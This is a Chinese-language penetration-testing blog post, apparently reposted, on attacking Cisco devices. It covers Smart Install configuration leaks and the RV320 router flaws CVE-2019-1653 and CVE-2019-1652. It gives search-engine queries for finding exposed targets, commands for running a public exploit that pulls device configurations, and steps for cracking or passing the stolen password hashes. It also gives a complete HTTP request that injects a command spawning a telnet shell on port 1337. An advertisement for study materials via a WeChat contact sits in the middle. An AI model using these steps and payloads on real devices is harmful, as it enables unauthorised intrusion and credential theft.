前言
在日常的滲透任務中,除了常見的集權設備,高危組件的漏洞挖掘,一些iot設備目標也是可以作為重點關注的存在,近期實戰中遇到了幾個cisco配置資訊泄漏的案例,借此機會復習總結下cisco常見的漏洞,
cisco SMI 配置泄漏
Cisco SMI 是一種即插即用功能,可為 Cisco 交換機提供零接觸部署并在 TCP 埠 4786 上進行通信,如果發現開放4786埠的cisco設備,那可以深入測驗一下,
fofa 陳述句 protocol="smi"
影響目標還挺多的
git clone https://github.com/ChristianPapathanasiou/CiscoSmartInstallExploit cd CiscoSmartInstallExploit pip2 install tftpy python2 cisco.py [ip]
注意用python2運行,運行成功會下載目標的運行配置
組態檔中存有設備用戶密碼,ACL配置,ftp配置賬號密碼等敏感資訊
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
如果想進一步分析組態檔可以下載 ccat 工具進行自動化分析
https://github.com/frostbits-security/ccat
git clone https://github.com/frostbits-security/ccat.git cd ccat pip3 install -r requirements.txt python3 ccat.py configuration_file
我們可以使用 --dump-creds 引數dump出賬號密碼
檔案名m500的可以用hashcat -m 500的掩碼進行爆破,5700同理
CVE-2019-1652 && CVE-2019-1653
Cisco RV320 路由器的配置可以在未經身份驗證的情況下通過設備的 Web 界面匯出,
fofa 陳述句 app="CISCO-RV320”
對應poc
ip:port/cgi-bin/config.exp
下載的組態檔中有賬號和md5的密碼,不過md5的格式為 md5($password.$auth_key),其中 auth_key 是一個靜態值,可以通過直接訪問 / 路徑找到,
當然在通過 CVE-2019-1653 獲得了賬號和md5的密碼后可以通過替換登錄包的hash進行登錄,無需解密
后臺可以配合 CVE-2019-1652 進行 rce
github上的利用poc由于不支持目標的自簽名證書 https://github.com/0x27/CiscoRV320Dump/blob/master/easy_access.py 這里就手動發包進行測驗
POST /certificate_handle2.htm?type=4 HTTP/1.1 Host: x.x.x.x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: mlap=RGVmYXVsdDk6Ojo6Y2lzY28= Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 319 ? page=self_generator.htm&totalRules=1&OpenVPNRules=30&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A&organization=A&organization_unit=A&email=ab%40example.com&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&SelectSubject_s=1&common_name=a%27%24%28telnetd%20-l%20%2Fbin%2Fsh%20-p%201337%29%27b
payload執行后會用telnet在本地監聽1337口
連接驗證
總結
-
cisco設備國內互聯網公司和企事業用得不多,近年來都被國產品牌替換了,
-
python的poc經常會遇到一些歷史遺留問題,比如tls版本過低,依賴庫安裝報錯不兼容等等問題,建議還是用go寫poc,利人利己,
更多靶場實驗練習、網安學習資料,請點擊這里>>
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/518739.html
標籤:其他
上一篇:JAVA代碼審計之xss